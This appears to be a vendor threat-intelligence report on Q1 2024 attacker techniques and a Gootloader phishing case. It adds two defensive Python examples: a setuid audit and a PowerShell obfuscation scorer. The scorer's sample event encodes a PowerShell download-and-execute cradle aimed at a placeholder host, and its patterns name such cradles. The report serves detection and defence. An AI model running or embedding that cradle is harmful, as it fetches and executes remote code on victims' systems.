May 14, 2024
Key Points
The first quarter of 2024 (Q1 2024) saw a series of impactful cybersecurity events, including critical vulnerabilities affecting Ivanti, Citrix, TeamCity, and ScreenConnect. Threat actors continued to evolve, notably with the adoption of Python for persistence in the “SocGholish” malware, as reported by ReliaQuest. Additionally, the I-Soon data leak provided rare insight into the operations of a Chinese advanced persistent threat (APT) group, improving the cybersecurity community’s understanding of Chinese state-sponsored actors. A law enforcement operation raised hopes that the “LockBit” ransomware group would dissipate, but despite the initial takedown, the group resurfaced and continued its operations.
This Threat Spotlight report highlights growing trends, such as exploitation for initial access and adversaries’ continued use of defense evasion techniques to remain undetected. We give security teams and executives insight into attacker behaviors to improve their understanding of the threat landscape, and we close with curated, actionable recommendations to help counter these techniques.
ReliaQuest analyzed a select group of true-positive customer incidents that had the potential to result in data breaches or theft (e.g., involving extortion, espionage, custom malware, hands-on-keyboard operations, commodity threats) categorized as “critical security incidents.” We aligned these incidents with the MITRE ATT&CK framework to identify trends and unique behaviors across the kill chain to provide an understanding of the threat landscape.
Phishing, Drive-by Compromise, and Exploitation Remain Top Techniques
Initial access involves an adversary attempting to gain a foothold in an organization’s network. The most common initial access technique, holding its top spot from the fourth quarter of last year, was phishing with a malicious link (T1566.002), appearing in 27.2% of critical security incidents recorded by ReliaQuest. Depending on the attack, the link either downloads malware or leads the target to a website that captures credentials. In second place, also maintaining its spot from the fourth quarter of last year, was drive-by compromise (T1189), appearing in 25.7% of incidents. This technique relies on users unknowingly downloading malware from either attacker-owned infrastructure or a compromised legitimate website; attackers target websites with high search engine rankings to increase the chance that the malware is downloaded. Lastly, the exploitation of public-facing applications (T1190) held its third-place spot from last quarter for initial access, turning up in 16.9% of incidents this quarter. This technique involves an adversary targeting a vulnerable, publicly accessible application, such as a virtual private network (VPN) gateway, and aligns with the number of critical vulnerabilities disclosed this quarter.
Attackers Continue to Prefer PowerShell for Execution
After gaining initial access, adversaries run code or commands on the compromised system. Windows Command Shell, cmd.exe (T1059.003), continues to lead as the top execution technique, accounting for 33.3% of incidents. The Windows command line is commonly used to execute malware or to run discovery commands post-access. The next most common execution technique this quarter was PowerShell (T1059.001), often used for malware installation, for executing ingressed tools, or for hands-on-keyboard activity. PowerShell was used in 19.4% of observed incidents this quarter, moving up from third place in the fourth quarter of 2023. In third place, we saw user execution of malicious files (T1204.002) in 11% of incidents, replacing Q4 2023’s third most common technique, user execution of a malicious link. Malicious files are commonly delivered in executable (.exe) or compressed (.zip) formats as a phishing email attachment, downloaded via drive-by compromise, or downloaded through a malicious link sent in a phishing email.
Scheduled Tasks Fall; Registry Keys and Startup Folder Favored for Persistence
Adding Windows registry run keys or placing malware in a startup folder (T1547.001) moved from second to first place this quarter among persistence methods, seen in 34.8% of incidents. In Q4 2023, attackers relied on valid domain accounts for persistence. This quarter, attackers more commonly created new accounts (T1136) after gaining access to an environment, their chosen tactic in 13.95% of incidents. Lastly, we observed a rise in the use of web shells (T1505.003) for persistence, observed in 11.63% of incidents. This technique is commonly employed following the exploitation of a web server, whether public-facing or internal.
Exploitation Tops for Privilege Escalation
Once they’ve established persistence, an adversary turns to privilege escalation. In the fourth quarter of last year, we most commonly observed the use of valid accounts or exploitation. Citrix Bleed (CVE-2023-4966) exploitation in particular was common; it occasionally granted higher privileges depending on the target account. In the first quarter of this year, exploitation for privilege escalation (T1068) increased significantly, from 7.1% to 46.6% of incidents involving privilege escalation. This surge is likely due to the two ScreenConnect vulnerabilities (CVE-2024-1709 and CVE-2024-1708) identified this quarter, which, upon successful exploitation, provided administrator credentials. Continuing from last quarter, we observed adversaries abusing valid domain accounts (T1078.002) to escalate privileges in 20% of incidents. In Q1 2024, we observed an uptick in adversaries modifying the setuid and setgid bits (T1548.001), a technique used in 6.6% of incidents where privilege escalation was observed. The setuid and setgid bits are Linux file permissions that cause a file to execute with the privileges of its owner or group rather than of the invoking user, so an attacker who can set them on a file they control gains elevated execution. The uptick in setuid and setgid modifications likely follows the rise in exploitation for initial access, since the exploited appliances run the Linux operating system.
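A defender-side check for the setuid/setgid behavior described above, added here as an example and not taken from the report or from ReliaQuest tooling: it walks a directory tree, lists regular files carrying the setuid or setgid bit, and diffs them against a known-good baseline so that a newly set bit on an unexpected file (the T1548.001 pattern) stands out. The demo tree, file names and baseline are constructed for this example; in practice you would run `unexpected_setid("/", baseline)` with a baseline captured from a clean build of the same image.

```python
"""Audit a directory tree for setuid/setgid files and compare against a baseline.
Added example, not the report's code. The demo tree and baseline are constructed."""
import os
import stat
import tempfile


def find_setid_files(root):
    """Return {relative_path: mode_string} for regular files under root that
    carry the setuid (S_ISUID) or setgid (S_ISGID) bit."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets, devices are not interesting here
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found[os.path.relpath(path, root)] = stat.filemode(st.st_mode)
    return found


def unexpected_setid(root, baseline):
    """Setid files under root whose relative path is not in the baseline set.
    Anything returned deserves a look: either the baseline is stale or
    someone has added privileged execution to a file that should not have it."""
    return {p: m for p, m in find_setid_files(root).items() if p not in baseline}


def _mkfile(path, mode):
    # Helper for the constructed demo tree: write a tiny script and chmod it.
    with open(path, "wb") as f:
        f.write(b"#!/bin/sh\nexit 0\n")
    os.chmod(path, mode)


def build_demo_tree():
    """Constructed filesystem slice for the example: one expected setuid binary,
    one ordinary binary, and two files in tmp/ that should never be setid."""
    root = tempfile.mkdtemp(prefix="setid_audit_")
    os.makedirs(os.path.join(root, "bin"))
    os.makedirs(os.path.join(root, "tmp"))
    _mkfile(os.path.join(root, "bin", "passwd"), 0o4755)   # expected: in baseline
    _mkfile(os.path.join(root, "bin", "ls"), 0o755)        # no setid bit at all
    _mkfile(os.path.join(root, "tmp", ".update"), 0o4755)  # unexpected setuid
    _mkfile(os.path.join(root, "tmp", "helper.sh"), 0o2755)  # unexpected setgid
    return root


# Constructed baseline: what a clean build of this (toy) image is allowed to ship.
DEMO_BASELINE = {"bin/passwd"}

if __name__ == "__main__":
    demo_root = build_demo_tree()
    for rel, mode in sorted(unexpected_setid(demo_root, DEMO_BASELINE).items()):
        print(f"UNEXPECTED {mode} {rel}")
```

Running the script prints the two tmp/ entries and nothing for bin/passwd. Running it periodically and alerting on any non-empty result is cheap, and the same `find_setid_files` output can be stored as the next baseline once each finding has been reviewed.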
Command Obfuscation and LNK Files Used for Defense Evasion
Defense evasion involves the adversary attempting to evade technical controls and detections. In the last quarter of 2023, we observed command obfuscation and abuse of the Windows RunDLL32 utility as the top defense evasion techniques. Holding its top spot was command obfuscation (T1027.010), used for defense evasion in 22.06% of incidents. Command obfuscation involves adding characters, strings, and encoding layers to malware or to the commands being executed so that signatures and analysts cannot read them directly. We then observed LNK icon smuggling (T1027.012) in 10.29% of incidents. Icon smuggling entails hiding the payload in the metadata of shortcut (.lnk) files. The execution of various malware families, such as Gootloader and Dorkbot, involved this behavior during either the initial or subsequent payload downloads. Lastly, we observed adversaries deleting files (T1070.004) to remove traces of the intrusion in 7.35% of incidents. This technique was most often used by malware to delete the initial file after successful installation, though we also observed it when an adversary with hands-on-keyboard access manually deleted files to cover their tracks.
Exploitation for Credential Access Surpasses Keylogging
Credential access involves an adversary attempting to obtain sensitive account credentials. In the last quarter of 2023, the primary methods of credential access we observed were credential theft from password stores, keylogging, and security account manager (SAM) dumping. In Q1 2024, we primarily observed adversaries gaining access to credentials through exploitation (T1212) in 24% of incidents. Credential theft from password stores (T1555), such as web browsers or password managers, fell to the second spot and occurred in 16% of incidents, a tactic often seen in malware infection chains that exfiltrate stolen credentials. Surpassing SAM dumping, access to Linux password storage files “/etc/passwd” and “/etc/shadow” (T1003.008) was noted in 12% of incidents, enabling attackers to conduct password cracking to acquire credentials.
System and Process Discovery Rise in Adoption
Once an adversary gains access to the environment and establishes persistence, they need to identify information such as their current permissions and the remote systems they can reach. In Q4 of last year, the top discovery technique we observed was the execution of system owner/user discovery commands. This quarter, however, system information discovery (T1082) was the most common, appearing in 15.3% of incidents; it reveals details of the current system, including its version, patches, architecture, and more. A formerly less common technique also rose this quarter: process discovery (T1057), observed in 12.8% of incidents, putting it in second place. This technique is common during malware execution, relaying back to the attacker which applications are running on the system. Remaining in third place from last quarter, domain account discovery (T1087.002) occurred in 7.8% of incidents. This technique, often carried out with the Net utility on Windows, produces a list of domain accounts for subsequent attacks.
Internal Phishing and Remote Windows Utilities Abused for Lateral Movement
After gaining a foothold and discovering information about the environment, adversaries aim to compromise other systems and move laterally through the environment. In the last quarter of 2023, we saw attackers largely using server message block (SMB) shares for lateral movement, employing tools such as PsExec. This quarter, the most common technique we observed was internal spearphishing (T1534), in 17.6% of incidents. Surpassing lateral tool transfer, remote desktop protocol (T1021.001) tied with Windows remote management (T1021.006) as the next most common technique, at 11.7% each. Both techniques abuse built-in Windows remote-access functionality to interact with and execute commands on other systems.
ReliaQuest closely monitors the malware featured in all critical security incidents. SocGholish shot to the top spot in the first quarter of this year despite having been relatively uncommon in Q4 2023. SocGholish is delivered via drive-by compromise, masquerading as a fake browser update in the form of a malicious JavaScript file. Last quarter, the top spot was occupied by “AsyncRAT,” a remote access trojan, which now sits in second place. It is primarily distributed in phishing emails as an attachment. “Dorkbot” and “Gootloader” malware were tied for the next most prevalent malware families, surpassing SolarMarker, which was in third place last quarter. Dorkbot is typically introduced to devices via USB, and Gootloader is deployed when users click on phishing links.
To inflict pain on an attacker, slow them down as much as possible while maintaining detection and response capabilities. Having covered the most common adversary techniques, let’s discuss how to effectively hinder a threat actor’s efforts.
Consider technical controls as a layer of defense-in-depth: they restrict the adversary’s options at each stage of their intended kill chain. For example, if SocGholish is successfully downloaded through drive-by compromise, a group policy that forces JavaScript files to open in Notepad instead of executing blocks the adversary from gaining execution on the system. Below, we examine a case study to highlight the importance of using technical controls and ensuring adequate visibility.
In February 2024, ReliaQuest responded to a detection triggered by obfuscated PowerShell executing in a customer environment.
In this incident, a user received a phishing email containing a Dropbox link. The user clicked the link and downloaded a file named “List of Required items and services.zip,” which contained the shortcut file “List of Required items and services.lnk”. When the user clicked the shortcut file, obfuscated PowerShell executed successfully on the host and downloaded the next stages of Gootloader, including a PDF file with an embedded payload that was loaded into a Visual Basic Script (VBS) file and executed. We observed the malware making successful outbound connections to its command-and-control (C2) infrastructure and establishing persistence. ReliaQuest quarantined the impacted host until the customer could restore it from a known good backup.
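The chain in this case study (a shortcut inside a ZIP, obfuscated PowerShell, then a VBS stage) is a good target for process-creation detection, and the obfuscation indicators are the ones the defense evasion section above groups under T1027.010. The Python below is an added example written for this post, not ReliaQuest or GreyMatter code: it scores constructed Sysmon-style process events for PowerShell obfuscation markers (decoding `-EncodedCommand` payloads so the inner script is inspected too), flags PowerShell launched by Explorer from a ZIP’s temporary extraction folder, and maps hits to the ATT&CK IDs used in this report. The field names, file paths, sample command line and the `example.invalid` host are assumptions constructed for the example.

```python
"""Score process-creation events for the obfuscated-PowerShell-from-LNK chain.
Added example; the events, field names and sample command are constructed."""
import base64
import binascii
import re

# Indicators of T1027.010-style obfuscation and suspicious PowerShell launch flags.
# Each regex is applied to the command line plus any decoded -EncodedCommand payload.
_INDICATORS = {
    "encoded_command": re.compile(r"(?i)(^|\s)-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "bypass_policy": re.compile(r"(?i)-e(xecutionpolicy|p)\s+bypass"),
    "no_profile": re.compile(r"(?i)-nop(rofile)?\b"),
    "string_concat": re.compile(r"'\s*\+\s*'|\"\s*\+\s*\""),
    "char_codes": re.compile(r"(?i)\[char\]\s*\d+"),
    "join_or_replace": re.compile(r"(?i)-join\b|\.replace\("),
    "invoke_expression": re.compile(r"(?i)\biex\b|invoke-expression"),
    "download_cradle": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"),
}

# Indicator names grouped under the ATT&CK IDs this report uses.
ATTACK_IDS = {
    "T1027.010": {"encoded_command", "string_concat", "char_codes", "join_or_replace", "invoke_expression"},
    "T1204.002": {"powershell_from_zip_shortcut"},
}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = _INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    token = m.group(0).split()[-1]
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_event(ev):
    """Count indicators for one process-creation event (Sysmon Event ID 1 shaped)."""
    cmd = ev["cmdline"]
    decoded = decode_encoded_command(cmd)
    text = cmd + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in _INDICATORS.items() if rx.search(text)]
    image, parent = ev["image"].lower(), ev["parent"].lower()
    cwd = ev.get("cwd", "").lower()
    # A shortcut double-clicked inside Explorer's ZIP view runs with Explorer as
    # parent and the temporary extraction folder (Temp1_<name>.zip) as working dir.
    if parent.endswith("explorer.exe") and ".zip" in cwd and image.endswith("powershell.exe"):
        hits.append("powershell_from_zip_shortcut")
    if image.endswith(("wscript.exe", "cscript.exe")) and ".vbs" in cmd.lower():
        hits.append("vbs_script_host")  # the VBS stage of the chain
    return {"image": image, "indicators": hits, "decoded": decoded, "score": len(hits)}


def attack_ids(result):
    """ATT&CK technique IDs implied by a scored event (only IDs named in the report)."""
    hits = set(result["indicators"])
    ids = {tid for tid, names in ATTACK_IDS.items() if hits & names}
    if result["image"].endswith("powershell.exe") and hits:
        ids.add("T1059.001")  # PowerShell execution
    return sorted(ids)


def triage(events, threshold=3):
    """Return scored events at or above the threshold, highest score first."""
    scored = [score_event(ev) for ev in events]
    return sorted((r for r in scored if r["score"] >= threshold), key=lambda r: -r["score"])


def _encoded(script):
    # PowerShell expects the encoded command as base64 of UTF-16LE text.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: an inert stage-2 fetch against a reserved .invalid host.
_SAMPLE_SCRIPT = "$u='http://'+'example.invalid'+'/stage2';IEX (New-Object Net.WebClient).DownloadString($u)"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\Documents\notes.txt", "cwd": r"C:\Users\alice\Documents"},
    {"parent": r"C:\Windows\explorer.exe", "image": _PS,
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc " + _encoded(_SAMPLE_SCRIPT),
     "cwd": r"C:\Users\alice\AppData\Local\Temp\Temp1_List of Required items and services.zip"},
    {"parent": _PS, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Roaming\update.vbs"', "cwd": r"C:\Users\alice"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": _PS,
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
     "cwd": r"C:\Users\admin"},
]

if __name__ == "__main__":
    for r in triage(EVENTS):
        print(r["score"], attack_ids(r), r["indicators"])
```

Only the second constructed event clears the default threshold: the launch flags, the decoded cradle and the ZIP-to-shortcut parentage together produce a high score, while the administrator’s `-NoProfile` one-liner scores a single point. Correlating the `vbs_script_host` hit on the third event by parent process (it is spawned by the flagged PowerShell) is the natural next step once events are keyed by process GUID rather than treated individually as here.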
By mapping this incident to the MITRE ATT&CK framework, we observed the following techniques:
Initial Access
Execution
Persistence
Defense Evasion
Command and Control
Main Takeaways
Given the importance of technical controls and adequate visibility, we identified several recommendations to enhance your organization’s security posture.
Technical Controls
Visibility
ReliaQuest forecasts with high confidence that phishing and drive-by downloads will continue to be the primary initial access techniques in the immediate future, because commodity malware such as SocGholish relies on these methods for delivery. Financially motivated adversaries will keep exploiting vulnerabilities that provide initial access, capitalizing on the window of opportunity before organizations can implement mitigations or patches. For that reason, it’s important to add technical controls that counter initial access and hinder attackers’ ability to execute code on systems. A defense-in-depth model is paramount: if an adversary does gain access, it restricts their movement and provides the visibility needed to respond.
ReliaQuest actively tracks threat actors’ tactics, techniques, and procedures (TTPs) to provide insight into trends and new behaviors. We use these observations to create custom detection rules that improve customers’ security posture.